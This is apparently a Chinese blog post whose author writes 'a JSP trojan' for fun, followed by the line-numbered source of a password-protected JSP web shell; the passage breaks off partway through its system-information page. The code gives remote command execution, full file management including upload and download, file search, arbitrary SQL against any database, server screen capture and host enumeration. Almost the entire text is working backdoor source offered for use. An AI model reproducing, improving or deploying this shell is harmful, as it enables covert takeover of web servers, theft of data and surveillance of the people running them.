纯碎手痒,写一个jsp木马。代码如下:
1 <%@ page contentType="text/html; charset=utf-8"%>
2 <%@ page import="java.io.*"%>
3 <%@ page import="java.util.*"%>
4 <%@ page import="java.nio.charset.Charset"%>
5 <%@ page import="java.util.regex.*"%>
6 <%@ page import="java.sql.*"%>
7 <%@ page import="java.util.zip.ZipEntry"%>
8 <%@ page import="java.util.zip.ZipOutputStream"%>
9 <%@ page import="java.text.DecimalFormat"%>
10 <%@ page import="java.net.InetAddress"%>
11 <%@ page import="java.awt.Dimension"%>
12 <%@ page import="java.awt.Toolkit"%>
13 <%@ page import="java.awt.image.BufferedImage"%>
14 <%@ page import="java.awt.Rectangle"%>
15 <%@ page import="java.awt.Robot"%>
16 <%@ page import="javax.imageio.ImageIO"%>
17 <%!
18 /*
19 * Code by Kenn
20 * QQ: 921506
21 */
22 private String myPassword = "hello";
23 private String shellName = "Hello Shell"; //title
24 /*
25 * 骷髅标志:\u2620 星月标志:\u262a 外星人标志:\ud83d\udc7d
26 */
27 private String loginIcon = "\u2620";
28 private int sessionOutTime = 30; //minutes
29 private static String language = "ENG"; //default language: ENG or CHN;
30 private String encodeType = "utf8";
31 //welcome info of login page
32 public static String welcomeMsg(){
33 return orChinese("Welcome for coming","你丫又来了");
34 }
35
36 private enum Operation{Edit,Delete,Rename,Download;}
37 private String curPath;
38 private boolean isDBconnected = false;
39 private Connection conn = null;
40 private Statement dbStatement = null;
41
42 private static Map<String,String> textMap = null;
43
44 static{
45 initMap();
46 }
47
48 public static void initMap(){
49 if (textMap==null){
50 textMap = new HashMap<String,String>();
51 textMap.put("Environment", "系统环境");
52 textMap.put("File Manager", "文件管理");
53 textMap.put("File Search", "文件搜索");
54 textMap.put("Command", "命令行");
55 textMap.put("Database", "数据库");
56 textMap.put("Screen Capture", "屏幕采集");
57 textMap.put("Logoff", "退出");
58 textMap.put("OS", "操作系统");
59 textMap.put("Computer Name", "计算机名");
60 textMap.put("Available Processors", "处理器可用核心数");
61 textMap.put("IP", "IP地址");
62 textMap.put("System Driver", "系统盘符");
63 textMap.put("Driver Info", "磁盘信息");
64 textMap.put("User Name", "用户名");
65 textMap.put("User DNS Domain", "用户域");
66 textMap.put("User Domain", "帐户的域名称");
67 textMap.put("User Profile", "用户目录");
68 textMap.put("All User Profile", "用户公共目录");
69 textMap.put("Temp", "用户临时文件目录");
70 textMap.put("Program Files", "默认程序目录");
71 textMap.put("AppData", "应用程序数据目录");
72 textMap.put("System Root", "系统启动目录");
73 textMap.put("Console", "控制台");
74 textMap.put("File Executable", "可执行后缀");
75 textMap.put("My Path", "本程序绝对路径");
76 textMap.put("User Dir", "当前用户工作目录");
77 textMap.put("Protocol", "网络协议");
78 textMap.put("Server Info", "服务器软件版本信息");
79 textMap.put("JDK Version", "JDK版本");
80 textMap.put("JDK Home", "JDK安装路径");
81 textMap.put("JVM Version", "JAVA虚拟机版本");
82 textMap.put("JVM Name", "JAVA虚拟机名");
83 textMap.put("Class Path", "JAVA类路径");
84 textMap.put("Java Library Path", "JAVA载入库搜索路径");
85 textMap.put("Java tmpdir", "JAVA临时目录");
86 textMap.put("Compiler", "JIT编译器名");
87 textMap.put("Java ext dirs", "扩展目录路径");
88 textMap.put("Remote Addr", "客户机地址");
89 textMap.put("Remote Host", "客户机器名");
90 textMap.put("Remote User", "客户机用户名");
91 textMap.put("Scheme", "请求方式");
92 textMap.put("Secure", "应用安全套接字层");
93 textMap.put("Yes", "是");
94 textMap.put("No", "否");
95 textMap.put("Edit", "编辑");
96 textMap.put("Delete", "删除");
97 textMap.put("Rename", "重命名");
98 textMap.put("Download", "下载");
99 textMap.put("File Name", "文件名");
100 textMap.put("Size", "大小");
101 textMap.put("Operation", "操作");
102 textMap.put("GOTO", "跳转");
103 textMap.put("Home", "家目录");
104 textMap.put("Select", "选择");
105 textMap.put("Upload", "上传");
106 textMap.put("Create File", "创建文件");
107 textMap.put("Create Folder", "创建文件夹");
108 textMap.put("Wrong Password","密码错误");
109 textMap.put("Folder name is null","文件夹名为空");
110 textMap.put("Content is null","内容为空");
111 textMap.put("File name is null","文件名为空");
112 textMap.put("Search from","搜索目录");
113 textMap.put("Search for file type","文件的后缀名");
114 textMap.put("Setting","设置");
115 textMap.put("Search by Name","按名称搜索");
116 textMap.put("Search by Content","按内容搜索");
117 textMap.put("Ignore Case","忽略大小写");
118 textMap.put("Search keyword","关键词");
119 textMap.put("Search","搜索");
120 textMap.put("Execute","执行");
121 textMap.put("Connect","连接");
122 textMap.put("Disconnect","断开");
123 textMap.put("Database Type","数据库类型");
124 textMap.put("Driver","驱动程序");
125 textMap.put("Host","主机地址");
126 textMap.put("Port","端口号");
127 textMap.put("DB Name","数据库名");
128 textMap.put("Username","用户名");
129 textMap.put("Password","密码");
130 textMap.put("SQL","SQL语句");
131 textMap.put("File is already exist","文件已存在");
132 textMap.put("Folder is empty","文件夹为空");
133 textMap.put("Bad command","错误的命令");
134 textMap.put("Save","保存");
135 textMap.put("Return Back","返回");
136 textMap.put("is not a text file","不是文本文件");
137 textMap.put("File can not be writed","文件不可写");
138 textMap.put("Save success","保存成功");
139 textMap.put("Exception","异常");
140 textMap.put("Folder already exist","文件夹已存在");
141 textMap.put("File already exist","文件已存在");
142 textMap.put("File upload success","文件上传成功");
143 textMap.put("File upload failed","文件上传失败");
144 textMap.put("connect failed","连接失败");
145 textMap.put("connect success","连接成功");
146 textMap.put("Can not connect to database","不能连接到数据库");
147 textMap.put("Invalid SQL","无效的SQL");
148 textMap.put("result","结果");
149 textMap.put("SQL execute failed","SQL执行失败");
150 textMap.put("SQL execute success","SQL执行成功");
151 textMap.put("Free, Total","可用,共");
152 textMap.put("Please input new name","请输入新的名字");
153 textMap.put("Name can not be null","名字不可为空");
154 textMap.put("Refresh","刷新");
155 }
156 }
157 public static String orChinese(String key){
158 return "CHN".equalsIgnoreCase(language)
159 ? textMap.get(key)
160 : key;
161 }
162 public static String orChinese(String english, String chinese){
163 textMap.put(english, chinese);
164 return orChinese(english);
165 }
166 public List<File> getFolderList(String path) {
167 List<File> rtnList = new ArrayList<File>();
168 File file = new File(path);
169 if (file.exists() && file.isDirectory()) {
170 File[] listFiles = file.listFiles(new FileFilter() {
171 public boolean accept(File pathname) {
172 return pathname.isDirectory();
173 }
174 });
175 rtnList.addAll(Arrays.asList(listFiles));
176 }
177 return rtnList;
178 }
179
180 public List<File> getFileList(String path) {
181 List<File> rtnList = new ArrayList<File>();
182 File file = new File(path);
183 if (file.exists() && file.isDirectory()) {
184 File[] listFiles = file.listFiles(new FileFilter() {
185 public boolean accept(File pathname) {
186 return pathname.isFile();
187 }
188 });
189 rtnList.addAll(Arrays.asList(listFiles));
190 }
191 return rtnList;
192 }
193
194 public class MyFile extends File {
195
196 private String htmlOperation;
197 private String requestUrl;
198
199 public MyFile(String pathname, String requestUrl) {
200 super(pathname);
201 this.requestUrl = requestUrl;
202 }
203
204 public String getHtmlOperation() {
205 return htmlOperation;
206 }
207
208 public void setHtmlOperation(Operation... Opers) {
209 this.htmlOperation = "";
210 for (Operation o : Opers) {
211 if (o.equals(Operation.Rename)) {
212 String url = requestUrl + "&fsAction=" + o + "&fileName=" + this.getName();
213 htmlOperation += " <a href=\"#\" onclick=\"rename(‘" + url + "‘,‘"
214 + orChinese("Please input new name") + "‘,‘" + orChinese("Name can not be null") + "‘)\">"
215 + orChinese(o.toString()) + "</a> ";
216 } else {
217 htmlOperation += " <a href=\"" + requestUrl + "&fsAction=" + o + "&fileName=" + this.getName()
218 + "\">" + orChinese(o.toString()) + "</a> ";
219 }
220 }
221 }
222
223 public String getLength() {
224 if (this.isDirectory())
225 return "";
226 return getSize(this.length());
227 }
228 }
229
230 public static String getSize(long size) {
231 DecimalFormat df = new DecimalFormat("0.00");
232 if (size >> 40 >= 1)
233 return df.format((float) size / 1024 / 1024 / 1024 / 1024) + " TB";
234 if (size >> 30 >= 1)
235 return df.format((float) size / 1024 / 1024 / 1024) + " GB";
236 else if (size >> 20 >= 1)
237 return df.format((float) size / 1024 / 1024) + " MB";
238 else if (size >> 10 >= 1)
239 return df.format((float) size / 1024) + " KB";
240 else
241 return df.format((float) size) + " B ";
242 }
243
244 public void download(String path, HttpServletResponse response) throws Exception {
245 try {
246 File file = new File(path);
247 String filename = file.getName();
248 String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase();
249 InputStream fis = new BufferedInputStream(new FileInputStream(path));
250 byte[] buffer = new byte[fis.available()];
251 fis.read(buffer);
252 fis.close();
253 response.reset();
254 response.addHeader("Content-Disposition",
255 "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1"));
256 response.addHeader("Content-Length", "" + file.length());
257 OutputStream toClient = new BufferedOutputStream(response.getOutputStream());
258 response.setContentType("application/octet-stream");
259 toClient.write(buffer);
260 toClient.flush();
261 toClient.close();
262 } catch (IOException ex) {
263 throw ex;
264 }
265 }
266
267 public static File createZip(String sourcePath, String zipPath) throws Exception {
268 FileOutputStream fos = null;
269 ZipOutputStream zos = null;
270 try {
271 File zipFile = new File(zipPath);
272 if (zipFile.exists()) {
273 throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName());
274 }
275 File srcFolder = new File(sourcePath);
276 if (!srcFolder.exists() || srcFolder.listFiles().length == 0) {
277 throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName());
278 }
279 fos = new FileOutputStream(zipPath);
280 zos = new ZipOutputStream(fos);
281 writeZip(new File(sourcePath), "", zos);
282 return zipFile;
283 } catch (Exception e) {
284 throw e;
285 } finally {
286 try {
287 if (zos != null)
288 zos.close();
289 if (fos != null)
290 fos.close();
291 } catch (Exception e) {
292 throw e;
293 }
294 }
295 }
296
297 private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception {
298 if (!file.exists())
299 return;
300 if (file.isDirectory()) {
301 parentPath += file.getName() + File.separator;
302 File[] files = file.listFiles();
303 for (File f : files) {
304 writeZip(f, parentPath, zos);
305 }
306 } else {
307 FileInputStream fis = null;
308 DataInputStream dis = null;
309 try {
310 fis = new FileInputStream(file);
311 dis = new DataInputStream(new BufferedInputStream(fis));
312 ZipEntry ze = new ZipEntry(parentPath + file.getName());
313 zos.putNextEntry(ze);
314 byte[] content = new byte[1024];
315 int len;
316 while ((len = fis.read(content)) != -1) {
317 zos.write(content, 0, len);
318 zos.flush();
319 }
320 } catch (Exception e) {
321 throw e;
322 } finally {
323 try {
324 if (dis != null)
325 dis.close();
326 if (fis != null)
327 fis.close();
328 } catch (Exception e) {
329 throw e;
330 }
331 }
332 }
333 }
334
335 public String exeCmd(String cmd) {
336 Runtime runtime = Runtime.getRuntime();
337 Process proc = null;
338 String retStr = "";
339 InputStreamReader insReader = null;
340 char[] tmpBuffer = new char[1024];
341 int nRet = 0;
342
343 try {
344 proc = runtime.exec(cmd);
345 insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
346
347 while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
348 retStr += new String(tmpBuffer, 0, nRet) + "\n";
349 }
350 insReader.close();
351 retStr = HTMLEncode(retStr);
352 return retStr;
353 } catch (Exception e) {
354 retStr = "<font color=\"red\">" + orChinese("Bad command") + ": \"" + cmd + "\"</font>";
355 return retStr;
356 }
357 }
358
359 public String HTMLEncode(String str) {
360 str = str.replaceAll(" ", " ");
361 str = str.replaceAll("<", "<");
362 str = str.replaceAll(">", ">");
363 str = str.replaceAll("\r\n", "<br>");
364 return str;
365 }
366
367 public String Unicode2GB(String str) {
368 String sRet = null;
369 if (str == null)
370 return "";
371 try {
372 sRet = new String(str.getBytes("ISO8859_1"), encodeType);
373 } catch (Exception e) {
374 sRet = str;
375 }
376
377 return sRet;
378 }
379
380 public String pathConvert(String path) {
381 String sRet = path.replace(‘\\‘, ‘/‘);
382 File file = new File(path);
383 if (file.getParent() != null) {
384 if (file.isDirectory()) {
385 if (!sRet.endsWith("/"))
386 sRet += "/";
387 }
388 } else {
389 if (!sRet.endsWith("/"))
390 sRet += "/";
391 }
392 return sRet;
393 }
394
395 public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) {
396 List<String> list = new ArrayList<String>();
397 searchFile(list, path, content, subfix, byname, ignoreCase);
398 StringBuilder sb = new StringBuilder();
399 for (String line : list) {
400 sb.append(line.replace("\\", "/") + "<br>");
401 }
402 return sb.toString();
403 }
404
405 private void searchFile(List<String> list, String path, String content, String subfix, boolean byname,
406 boolean ignoreCase) {
407 path = pathConvert(path);
408 File dir = new File(path);
409 if (dir.exists() && dir.isDirectory()) {
410 if (dir.list() != null && dir.list().length > 0) {
411 for (File f : dir.listFiles()) {
412 if (!f.isDirectory()) {
413 String fname = f.getName();
414 String srcStr = f.getName();
415 if (containsSubfix(fname, subfix.split(" "))) {
416 if (!byname) {
417 srcStr = readText(f);
418 }
419 if (ignoreCase) {
420 content = content.toUpperCase();
421 srcStr = srcStr.toUpperCase();
422 }
423 if (srcStr.contains(content)) {
424 list.add(f.getAbsolutePath());
425 }
426 }
427 } else {
428 searchFile(list, f.getAbsolutePath(), content, subfix, byname, ignoreCase);
429 }
430 }
431 }
432 }
433 }
434
435 private boolean containsSubfix(String name, String[] subfixs) {
436 boolean rtn = false;
437 if (subfixs == null || subfixs.length == 0)
438 return rtn;
439 for (String ext : subfixs) {
440 if (name.toUpperCase().endsWith(ext.toUpperCase())) {
441 rtn = true;
442 }
443 }
444 return rtn;
445 }
446
447 public static String readText(File file) {
448 StringBuilder sb = new StringBuilder();
449 BufferedReader reader = null;
450 try {
451 reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312"));
452 String str = null;
453 while ((str = reader.readLine()) != null) {
454 sb.append(str);
455 }
456 } catch (Exception e) {
457 e.printStackTrace();
458 } finally {
459 try {
460 reader.close();
461 } catch (Exception e) {
462 e.printStackTrace();
463 }
464 }
465 return sb.toString();
466
467 }
468
469 public String openFile(String path, String fileName, String curUri) {
470 String sRet = "";
471 String fileString = null;
472 File curFile = null;
473 path = pathConvert(path);
474 try {
475 fileString = "";
476 curFile = new File(path, fileName);
477 FileReader fileReader = new FileReader(curFile);
478 char[] chBuffer = new char[1024];
479 int nRet;
480 while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
481 fileString += new String(chBuffer, 0, nRet);
482 }
483 if (fileString != null) {
484 sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
485 sRet += " <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path
486 + "&fsAction=save" + "\">\n";
487 sRet += " <input type=\"hidden\" name=\"fileName\" value=\"" + fileName + "\" />\n";
488 sRet += " <tr>\n";
489 sRet += " <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">"
490 + orChinese("Return Back") + "</a>]</td>\n";
491 sRet += " </tr>\n";
492 sRet += " <tr>\n";
493 sRet += " <td align=\"left\">\n";
494 sRet += " <textarea name=\"fileContent\" class=\"trans\" style=\"display:block;width:100%\" rows=\"32\" >\n";
495 sRet += HTMLEncode(fileString).replace("<br>", "\r\n");
496 sRet += " </textarea>\n";
497 sRet += " </td>\n";
498 sRet += " </tr>\n";
499 sRet += " <tr>\n";
500 sRet += " <td align=\"center\"><input type=\"submit\" class=\"trans\" value=\""
501 + orChinese("Save") + "\" /></td>\n";
502 sRet += " </tr>\n";
503 sRet += " </form>\n";
504 sRet += "</table>\n";
505 }
506 fileReader.close();
507 } catch (IOException e) {
508 sRet = "<font color=\"red\">\"" + path + "\" " + orChinese("is not a text file") + "</font>";
509 }
510 return sRet;
511 }
512
513 public String saveFile(String path, String fileName, String curUri, String fileContent) {
514 String sRet = "";
515 File file = null;
516
517 path = pathConvert(path);
518
519 try {
520 file = new File(path, fileName);
521
522 if (!file.canWrite()) {
523 sRet = "<font color=\"red\">" + orChinese("File can not be writed") + "</font>";
524 } else {
525 FileWriter fileWriter = new FileWriter(file);
526 fileWriter.write(fileContent);
527
528 fileWriter.close();
529 sRet = orChinese("Save success") + "!\n";
530 sRet += "<meta http-equiv=\"refresh\" content=\"1;url=" + curUri + "&curPath=" + path
531 + "&fsAction=list\" />\n";
532 }
533 } catch (IOException e) {
534 sRet = "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
535 }
536 return sRet;
537 }
538
539 public String createFolder(String path, String fileName, String url) {
540 try {
541 File file = new File(path, fileName);
542 if (file.exists())
543 return orChinese("Folder already exist") + "!";
544 else
545 file.mkdirs();
546 } catch (Exception e) {
547 return "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
548 }
549 return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
550 }
551
552 public String createFile(String path, String fileName, String url) {
553 try {
554 File file = new File(path, fileName);
555 if (file.exists())
556 return orChinese("File already exist") + "!";
557 else
558 file.createNewFile();
559 } catch (Exception e) {
560 return "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
561 }
562 return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
563 }
564
565 public String deleteFile(String path, String fileName, String url) {
566 File file = new File(path, fileName);
567 if (file.exists())
568 file.delete();
569 return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
570 }
571
572 public String download(String path, String fileName, String url, HttpServletResponse response) {
573 String rtnStr = "";
574 File file = new File(path, fileName);
575 File downFile = null;
576 if (!file.exists())
577 return null;
578 try {
579 if (file.isDirectory()) {
580 file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip");
581 }
582 download(file.getAbsolutePath(), response);
583 } catch (Exception e) {
584 rtnStr = e.getMessage();
585 }
586 return rtnStr;
587 }
588
589 public String rename(String path, String fileName, String newFile, String url) {
590 File file = new File(path, fileName);
591 File nFile = new File(path, newFile);
592 if (file.exists()) {
593 file.renameTo(nFile);
594 }
595 return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
596 }
597
598 public String uploadFile(ServletRequest request, String path, String curUri) {
599 String sRet = "";
600 File file = null;
601 InputStream in = null;
602 path = pathConvert(path);
603 try {
604 in = request.getInputStream();
605 byte[] inBytes = new byte[request.getContentLength()];
606 int nBytes;
607 int start = 0;
608 int end = 0;
609 int size = 1024;
610 String token = null;
611 String filePath = null;
612 while ((nBytes = in.read(inBytes, start, size)) != -1) {
613 start += nBytes;
614 }
615 in.close();
616 int i = 0;
617 byte[] seperator;
618
619 while (inBytes[i] != 13) {
620 i++;
621 }
622 seperator = new byte[i];
623
624 for (i = 0; i < seperator.length; i++) {
625 seperator[i] = inBytes[i];
626 }
627 String dataHeader = null;
628 i += 3;
629 start = i;
630 while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) {
631 i++;
632 }
633 end = i - 1;
634 dataHeader = new String(inBytes, start, end - start + 1);
635 token = "filename=\"";
636 start = dataHeader.indexOf(token) + token.length();
637 token = "\"";
638 end = dataHeader.indexOf(token, start) - 1;
639 filePath = dataHeader.substring(start, end + 1);
640 i += 4;
641 start = i;
642 end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
643 File newFile = new File(path + filePath);
644 newFile.createNewFile();
645 FileOutputStream out = new FileOutputStream(newFile);
646 out.write(inBytes, start, end - start + 1);
647 out.close();
648
649 sRet = "<script language=\"javascript\">\n";
650 sRet += "alert(\"" + orChinese("File upload success") + "! " + filePath + "\");\n";
651 sRet += "</script>\n";
652 } catch (IOException e) {
653 sRet = "<script language=\"javascript\">\n";
654 sRet += "alert(\"" + orChinese("File upload failed") + "!\");\n";
655 sRet += "</script>\n";
656 }
657
658 sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
659 return sRet;
660 }
661
662 public String DBConnect(String url, String username, String password) {
663 String bRet = orChinese("connect failed");
664 if (url != null) {
665 try {
666 if (username != null && username.trim().length() > 0) {
667 conn = DriverManager.getConnection(url, username, password);
668 } else {
669 conn = DriverManager.getConnection(url);
670 }
671 dbStatement = conn.createStatement();
672 bRet = orChinese("connect success");
673 } catch (SQLException e) {
674 bRet = orChinese("connect failed") + ": " + e.getMessage();
675 }
676 }
677 return bRet;
678 }
679
680 public String DBExecute(String sql) {
681 String sRet = "";
682 if (sql == null)
683 return "SQL is null";
684 if (conn == null || dbStatement == null) {
685 sRet = "<font color=\"red\">" + orChinese("Can not connect to database") + "</font>";
686 } else {
687 try {
688 if (sql.length() <= 6)
689 return "<font color=\"red\">" + orChinese("Invalid SQL") + "</font>";
690 if (sql.toLowerCase().substring(0, 6).equals("select")) {
691 ResultSet rs = dbStatement.executeQuery(sql);
692 ResultSetMetaData rsmd = rs.getMetaData();
693 int colNum = rsmd.getColumnCount();
694 int colType;
695
696 sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\n";
697 sRet += "<table align=\"center\" border=\"0\" cellpadding=\"2\" cellspacing=\"1\">\n";
698 sRet += " <tr>\n";
699 for (int i = 1; i <= colNum; i++) {
700 sRet += " <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
701 }
702 sRet += " </tr>\n";
703 while (rs.next()) {
704 sRet += " <tr>\n";
705 for (int i = 1; i <= colNum; i++) {
706 colType = rsmd.getColumnType(i);
707
708 sRet += " <td>";
709 switch (colType) {
710 case Types.BIGINT:
711 sRet += rs.getLong(i);
712 break;
713
714 case Types.BIT:
715 sRet += rs.getBoolean(i);
716 break;
717
718 case Types.BOOLEAN:
719 sRet += rs.getBoolean(i);
720 break;
721
722 case Types.CHAR:
723 sRet += rs.getString(i);
724 break;
725
726 case Types.DATE:
727 sRet += rs.getDate(i).toString();
728 break;
729
730 case Types.DECIMAL:
731 sRet += rs.getDouble(i);
732 break;
733
734 case Types.NUMERIC:
735 sRet += rs.getDouble(i);
736 break;
737
738 case Types.REAL:
739 sRet += rs.getDouble(i);
740 break;
741
742 case Types.DOUBLE:
743 sRet += rs.getDouble(i);
744 break;
745
746 case Types.FLOAT:
747 sRet += rs.getFloat(i);
748 break;
749
750 case Types.INTEGER:
751 sRet += rs.getInt(i);
752 break;
753
754 case Types.TINYINT:
755 sRet += rs.getShort(i);
756 break;
757
758 case Types.VARCHAR:
759 sRet += rs.getString(i);
760 break;
761
762 case Types.TIME:
763 sRet += rs.getTime(i).toString();
764 break;
765
766 case Types.DATALINK:
767 sRet += rs.getTimestamp(i).toString();
768 break;
769 }
770 sRet += " </td>\n";
771 }
772 sRet += " </tr>\n";
773 }
774 sRet += "</table>\n";
775
776 rs.close();
777 } else {
778 if (dbStatement.execute(sql)) {
779 sRet = orChinese("SQL execute success");
780 } else {
781 sRet = "<font color=\"red\">" + orChinese("SQL execute failed") + "</font>";
782 }
783 }
784 } catch (SQLException e) {
785 sRet = "<font color=\"red\">" + orChinese("SQL execute failed") + "</font>";
786 }
787 }
788
789 return sRet;
790 }
791
792 private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception {
793 try{
794 response.reset();
795 response.setContentType("image/jpg");
796 ServletOutputStream sos = response.getOutputStream();
797 response.setHeader("Pragma", "No-cache");
798 response.setHeader("Cache-Control", "no-cache");
799 response.setDateHeader("Expires", 0);
800 Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
801 BufferedImage screenshot = (new Robot())
802 .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight()));
803 ByteArrayOutputStream bos = new ByteArrayOutputStream();
804 ImageIO.write(screenshot, "jpg", bos);
805 byte[] buf = bos.toByteArray();
806 response.setContentLength(buf.length);
807 sos.write(buf);
808 bos.close();
809 sos.close();
810 }catch(Exception e){
811 }
812 }
813
814 public String getDriverInfo() {
815 String str = "";
816 File[] roots = File.listRoots();
817 for (File file : roots) {
818 str += file.getPath() + " (";
819 str += getSize(file.getFreeSpace()) + " " + orChinese("Free, Total") + " ";
820 str += getSize(file.getTotalSpace()) + ")<br>";
821 }
822 return str;
823 }%>
824
825 <html>
826 <head>
827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
828 <style>
829 body {font-size: 14px;font-family: 宋 体 ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;}
830 .trans {background: transparent;margin: 1 1 1 1;color: white;}
831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;}
832 textarea {border: black solid 1;}
833 table {border-collapse: collapse;}
834 table.onhover tr:hover{background:red;}
835 td {border: 1px dotted #FFF;height: 18px;}
836 .break-all {word-break: break-all;}
837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;}
838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;}
839 a:link, a:visited {text-decoration: none;color: #FFF;}
840 a:hover {text-decoration: underline;color: #FFF;}
841
842 </style>
843 <script type="text/JavaScript">
844 var pressKey = function() {
845 if (event.keyCode == 13) {
846 event.returnValue = false;
847 event.cancel = true;
848 loginForm.submit();
849 }
850 }
851 var redirect = function(action) {
852 var actionOption = document.getElementById(‘actionOption‘);
853 actionOption.value = action;
854 actionForm.submit();
855 }
856 var createFile = function(url){
857 var filename = document.getElementById(‘createFileName‘);
858 window.location.href = url + "&fileName=" + filename.value;
859 }
860 var rename = function(url, msg, errormsg){
861 var result = prompt(msg + ":" ,"")
862 if (result){
863 window.location.href=url + "&newName=" + result;
864 }else{
865 alert(errormsg);
866 }
867 }
868 var dbsubmit = function(fsAction){
869 var form = document.getElementById("sqlform");
870 form.action += "&fsAction=" + fsAction;
871 document.getElementById("sqlform").submit();
872 }
873 var languageChanged = function(url , oldurl){
874 oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}");
875 url = url + "&oldurl=" + oldurl;
876 window.location.href = url;
877 }
878 </script>
879 <title><%=shellName %></title>
880 </head>
881 <body>
882 <%
883 session.setMaxInactiveInterval(sessionOutTime * 60);
884 if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) {
885 if (request.getParameter("lang") !=null){
886 language = request.getParameter("lang");
887 String oldurl = request.getParameter("oldurl");
888 String str = "<meta http-equiv=\"refresh\" content=\"0;url="+oldurl+"\" />";
889 out.println(str);
890 out.flush();
891 }
892 %>
893 <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font>
894 <form name="loginForm">
895 <font size=4><%=welcomeMsg() %></font><br><br>
896 <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" />
897 </form>
898 <%
899 } else {
900 String password = null;
901 if (session.getAttribute("myPassword") == null) {
902 password = (String) request.getParameter("myPassword");
903 if (!myPassword.equals(password)) {
904 String rtnStr = "<div align=\"center\"><br><br><font color=\"red\">"+orChinese("Wrong Password")+"</font></div>";
905 rtnStr += "<meta http-equiv=\"refresh\" content=\"1;url=" + request.getRequestURL() + "\" />";
906 out.println(rtnStr);
907 out.flush();
908 //out.close();
909 return;
910 }
911 session.setAttribute("myPassword", password);
912 } else {
913 password = (String) session.getAttribute("myPassword");
914 }
915
916 String action = null;
917 if (request.getParameter("action") == null)
918 action = "env";
919 else
920 action = (String) request.getParameter("action");
921
922 if (action.equals("exit")) {
923 session.removeAttribute("myPassword");
924 response.sendRedirect(request.getRequestURI());
925 //out.close();
926 return;
927 }
928 %>
929 <form name="actionForm">
930 <input id="actionOption" type="hidden" name="action" value="Environment" />
931 </form>
932 <div style="margin-left: 2px">
933 <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div>
934 <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div>
935 <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div>
936 <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div>
937 <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div>
938 <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div>
939 <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div>
940 </div>
941 <% if (action.equals("lang")){
942 language = request.getParameter("lang");
943 String oldurl = request.getParameter("oldurl");
944 if (oldurl!= null){
945 oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?");
946 }
947 String sRet = "<meta http-equiv=\"refresh\" content=\"0;url="+oldurl+"\" />";
948 %>
949 <div class="container break-all"><%=sRet %></div>
950 <%
951 }else if (action.equals("env")) {
952 %>
953 <table class="container break-all onhover">
954 <tr>
955 <td width="20%"><%=orChinese("OS") %></td>
956 <td width="80%"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td>
957 </tr>
958 <tr>
959 <td><%=orChinese("Computer Name") %></td>
960 <td><%=System.getenv().get("COMPUTERNAME")%></td>
961 </tr>
962 <tr>
963 <td><%=orChinese("Available Processors") %></td>
964 <td><%=Runtime.getRuntime().availableProcessors() %></td>
965 </tr>
966 <tr>
967 <td><%=orChinese("IP") %></td>
968 <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td>
969 </tr>
970 <tr>
971 <td><%=orChinese("System Driver") %></td>
972 <td><%=System.getenv().get("SystemDrive")%></td>
973 </tr>
974 <tr>
975 <td><%=orChinese("Driver Info") %></td>
976 <td><%=getDriverInfo() %></td>
977 </tr>
978 <tr>
979 <td><%=orChinese("User Name") %></td>
980 <td><%=System.getenv().get("USERNAME")%></td>
981 </tr>
982 <tr>
983 <td><%=orChinese("User Domain") %></td>
984 <td><%=System.getenv().get("USERDOMAIN")%></td>
985 </tr>
986 <tr>
987 <td><%=orChinese("User DNS Domain") %></td>
